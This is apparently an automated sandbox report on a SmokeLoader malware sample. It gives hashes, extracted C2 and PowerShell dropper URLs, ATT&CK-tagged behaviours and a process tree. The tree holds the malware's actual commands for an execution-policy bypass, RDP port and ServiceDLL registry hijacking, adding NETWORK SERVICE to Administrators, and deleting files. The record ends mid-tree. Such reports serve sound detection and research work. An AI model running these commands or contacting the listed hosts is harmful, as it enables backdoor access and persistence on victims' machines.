smokeloader | 874646ae5e48bcb2e0f85adf92ba4a8e7a91a3124f7c35ec9228dda6fa568678

Analysis

max time kernel
151s
max time network
129s
platform
windows10_x64
resource
win10-en-20210920
submitted
18-10-2021 12:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d8c17d8c7ca799fe434174b292115685.exe
Size

262KB
MD5

d8c17d8c7ca799fe434174b292115685
SHA1

933bf284ae175f9b8667014c58ced7c25dc4be9d
SHA256

874646ae5e48bcb2e0f85adf92ba4a8e7a91a3124f7c35ec9228dda6fa568678
SHA512

559ed328c109616e6754a023d53085737ae9e382b093dba9f5d5610f9485fee1b10d46d515f4df309c9685d977f1c9b0ee7fd94ff8d2bcf741e9059611bfadd9

Score

10^/10

smokeloader backdoor persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
46	360	powershell.exe
48	360	powershell.exe
49	360	powershell.exe
50	360	powershell.exe
52	360	powershell.exe
54	360	powershell.exe
56	360	powershell.exe
58	360	powershell.exe
60	360	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3080	E35.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000b00000001abc1-365.dat	upx
behavioral2/files/0x000900000001abc4-366.dat	upx

Deletes itself 1 IoCs

pid	Process
2452	Process not Found

Loads dropped DLL 2 IoCs

pid	Process
3124	Process not Found
3124	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vzhlxznm.4do.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6A5E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6A7F.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hq3houte.hib.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6ABF.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6A9F.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6ADF.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d8c17d8c7ca799fe434174b292115685.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d8c17d8c7ca799fe434174b292115685.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d8c17d8c7ca799fe434174b292115685.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4532	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	50	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	52	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	49	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3320	d8c17d8c7ca799fe434174b292115685.exe
3320	d8c17d8c7ca799fe434174b292115685.exe
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2452	Process not Found

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
624	Process not Found
624	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3320	d8c17d8c7ca799fe434174b292115685.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	60	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeIncreaseQuotaPrivilege	2932	powershell.exe
Token: SeSecurityPrivilege	2932	powershell.exe
Token: SeTakeOwnershipPrivilege	2932	powershell.exe
Token: SeLoadDriverPrivilege	2932	powershell.exe
Token: SeSystemProfilePrivilege	2932	powershell.exe
Token: SeSystemtimePrivilege	2932	powershell.exe
Token: SeProfSingleProcessPrivilege	2932	powershell.exe
Token: SeIncBasePriorityPrivilege	2932	powershell.exe
Token: SeCreatePagefilePrivilege	2932	powershell.exe
Token: SeBackupPrivilege	2932	powershell.exe
Token: SeRestorePrivilege	2932	powershell.exe
Token: SeShutdownPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeSystemEnvironmentPrivilege	2932	powershell.exe
Token: SeRemoteShutdownPrivilege	2932	powershell.exe
Token: SeUndockPrivilege	2932	powershell.exe
Token: SeManageVolumePrivilege	2932	powershell.exe
Token: 33	2932	powershell.exe
Token: 34	2932	powershell.exe
Token: 35	2932	powershell.exe
Token: 36	2932	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeIncreaseQuotaPrivilege	5012	powershell.exe
Token: SeSecurityPrivilege	5012	powershell.exe
Token: SeTakeOwnershipPrivilege	5012	powershell.exe
Token: SeLoadDriverPrivilege	5012	powershell.exe
Token: SeSystemProfilePrivilege	5012	powershell.exe
Token: SeSystemtimePrivilege	5012	powershell.exe
Token: SeProfSingleProcessPrivilege	5012	powershell.exe
Token: SeIncBasePriorityPrivilege	5012	powershell.exe
Token: SeCreatePagefilePrivilege	5012	powershell.exe
Token: SeBackupPrivilege	5012	powershell.exe
Token: SeRestorePrivilege	5012	powershell.exe
Token: SeShutdownPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeSystemEnvironmentPrivilege	5012	powershell.exe
Token: SeRemoteShutdownPrivilege	5012	powershell.exe
Token: SeUndockPrivilege	5012	powershell.exe
Token: SeManageVolumePrivilege	5012	powershell.exe
Token: 33	5012	powershell.exe
Token: 34	5012	powershell.exe
Token: 35	5012	powershell.exe
Token: 36	5012	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeIncreaseQuotaPrivilege	700	powershell.exe
Token: SeSecurityPrivilege	700	powershell.exe
Token: SeTakeOwnershipPrivilege	700	powershell.exe
Token: SeLoadDriverPrivilege	700	powershell.exe
Token: SeSystemProfilePrivilege	700	powershell.exe
Token: SeSystemtimePrivilege	700	powershell.exe
Token: SeProfSingleProcessPrivilege	700	powershell.exe
Token: SeIncBasePriorityPrivilege	700	powershell.exe
Token: SeCreatePagefilePrivilege	700	powershell.exe
Token: SeBackupPrivilege	700	powershell.exe
Token: SeRestorePrivilege	700	powershell.exe
Token: SeShutdownPrivilege	700	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeSystemEnvironmentPrivilege	700	powershell.exe
Token: SeRemoteShutdownPrivilege	700	powershell.exe
Token: SeUndockPrivilege	700	powershell.exe
Token: SeManageVolumePrivilege	700	powershell.exe
Token: 33	700	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2452	Process not Found
2452	Process not Found
2452	Process not Found
2452	Process not Found

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2452	Process not Found
2452	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 3080	2452	Process not Found	71
PID 2452 wrote to memory of 3080	2452	Process not Found	71
PID 3080 wrote to memory of 60	3080	E35.exe	73
PID 3080 wrote to memory of 60	3080	E35.exe	73
PID 60 wrote to memory of 1068	60	powershell.exe	75
PID 60 wrote to memory of 1068	60	powershell.exe	75
PID 1068 wrote to memory of 2180	1068	csc.exe	76
PID 1068 wrote to memory of 2180	1068	csc.exe	76
PID 60 wrote to memory of 2932	60	powershell.exe	77
PID 60 wrote to memory of 2932	60	powershell.exe	77
PID 60 wrote to memory of 5012	60	powershell.exe	80
PID 60 wrote to memory of 5012	60	powershell.exe	80
PID 60 wrote to memory of 700	60	powershell.exe	82
PID 60 wrote to memory of 700	60	powershell.exe	82
PID 60 wrote to memory of 2124	60	powershell.exe	84
PID 60 wrote to memory of 2124	60	powershell.exe	84
PID 60 wrote to memory of 4532	60	powershell.exe	85
PID 60 wrote to memory of 4532	60	powershell.exe	85
PID 60 wrote to memory of 4412	60	powershell.exe	86
PID 60 wrote to memory of 4412	60	powershell.exe	86
PID 60 wrote to memory of 2904	60	powershell.exe	87
PID 60 wrote to memory of 2904	60	powershell.exe	87
PID 2904 wrote to memory of 896	2904	net.exe	88
PID 2904 wrote to memory of 896	2904	net.exe	88
PID 60 wrote to memory of 3088	60	powershell.exe	89
PID 60 wrote to memory of 3088	60	powershell.exe	89
PID 3088 wrote to memory of 3692	3088	cmd.exe	90
PID 3088 wrote to memory of 3692	3088	cmd.exe	90
PID 3692 wrote to memory of 3724	3692	cmd.exe	91
PID 3692 wrote to memory of 3724	3692	cmd.exe	91
PID 3724 wrote to memory of 2352	3724	net.exe	92
PID 3724 wrote to memory of 2352	3724	net.exe	92
PID 60 wrote to memory of 3676	60	powershell.exe	93
PID 60 wrote to memory of 3676	60	powershell.exe	93
PID 3676 wrote to memory of 2112	3676	cmd.exe	94
PID 3676 wrote to memory of 2112	3676	cmd.exe	94
PID 2112 wrote to memory of 3904	2112	cmd.exe	95
PID 2112 wrote to memory of 3904	2112	cmd.exe	95
PID 3904 wrote to memory of 3688	3904	net.exe	96
PID 3904 wrote to memory of 3688	3904	net.exe	96
PID 1904 wrote to memory of 3556	1904	cmd.exe	100
PID 1904 wrote to memory of 3556	1904	cmd.exe	100
PID 3556 wrote to memory of 4048	3556	net.exe	101
PID 3556 wrote to memory of 4048	3556	net.exe	101
PID 4224 wrote to memory of 620	4224	cmd.exe	104
PID 4224 wrote to memory of 620	4224	cmd.exe	104
PID 620 wrote to memory of 1184	620	net.exe	105
PID 620 wrote to memory of 1184	620	net.exe	105
PID 1616 wrote to memory of 1488	1616	cmd.exe	108
PID 1616 wrote to memory of 1488	1616	cmd.exe	108
PID 1488 wrote to memory of 1408	1488	net.exe	109
PID 1488 wrote to memory of 1408	1488	net.exe	109
PID 2340 wrote to memory of 2440	2340	cmd.exe	112
PID 2340 wrote to memory of 2440	2340	cmd.exe	112
PID 2440 wrote to memory of 2516	2440	net.exe	113
PID 2440 wrote to memory of 2516	2440	net.exe	113
PID 2788 wrote to memory of 2384	2788	cmd.exe	116
PID 2788 wrote to memory of 2384	2788	cmd.exe	116
PID 2384 wrote to memory of 4132	2384	net.exe	117
PID 2384 wrote to memory of 4132	2384	net.exe	117
PID 4932 wrote to memory of 1220	4932	cmd.exe	120
PID 4932 wrote to memory of 1220	4932	cmd.exe	120
PID 1220 wrote to memory of 5004	1220	net.exe	121
PID 1220 wrote to memory of 5004	1220	net.exe	121

C:\Users\Admin\AppData\Local\Temp\d8c17d8c7ca799fe434174b292115685.exe
"C:\Users\Admin\AppData\Local\Temp\d8c17d8c7ca799fe434174b292115685.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3320

C:\Users\Admin\AppData\Local\Temp\E35.exe
C:\Users\Admin\AppData\Local\Temp\E35.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mfpx3pvb\mfpx3pvb.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28C1.tmp" "c:\Users\Admin\AppData\Local\Temp\mfpx3pvb\CSCDD5018C661B14C26983E9A8C37D5DDC.TMP"
      4⤵
      PID:2180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:700
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2124
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:4532
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4412
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:896
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3692
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3724
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2352
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3904
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2804

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\system32\net.exe
